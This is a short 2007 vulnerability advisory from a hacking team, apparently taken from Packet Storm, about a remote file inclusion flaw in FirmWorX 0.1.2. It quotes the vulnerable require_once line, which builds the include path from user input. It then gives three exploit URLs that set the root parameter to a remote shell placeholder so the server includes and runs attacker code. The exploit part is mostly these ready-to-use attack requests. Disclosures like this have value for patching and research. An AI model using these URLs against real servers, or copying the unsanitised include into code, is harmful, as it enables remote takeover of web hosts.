firmworx-rfi.txt

2007-05-30T00:00:00
ID PACKETSTORM:56961
Type packetstorm
Reporter Dav00d_Cracker
Modified 2007-05-30T00:00:00

Description

                                        
                                            `**********************************************************************************************************  
DeltaSecurityTEAM  
WwW.DeltaSecurity.iR  
**********************************************************************************************************  
  
* Portal Name = FirmWorX 0.1.2  
  
* Class = Remote File Inclusion  
  
* Risk = High (Remote File Execution)  
  
* Download = http://firmworx.sourceforge.net  
  
* Discoverd By = DeltahackingTEAM  
  
* User In Delta Team = Dav00d_Cracker  
  
* Conatact = Davood_cracker@yahoo.com  
  
--------------------------------------------------------------------------------------------  
  
Vulnerability C0de :  
  
  
require_once($fm_data['root']."/includes/config/db.inc.php");  
  
--------------------------------------------------------------------------------------------  
  
- Expl0it:  
  
http://localhost/[PATH]/includes/config/master.inc.php?fm_data[root]=Shellz?  
http://localhost/[PATH]/includes/functions/master.inc.php?fm_data[root]=Shellz?  
http://localhost/[PATH]/modules/bank/includes/design/main.inc.php?bank_data[root]=Shellz?  
  
--------------------------------------------------------------------------------------------  
  
Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , And all I  
  
**********************************************************************************************************  
  
  
`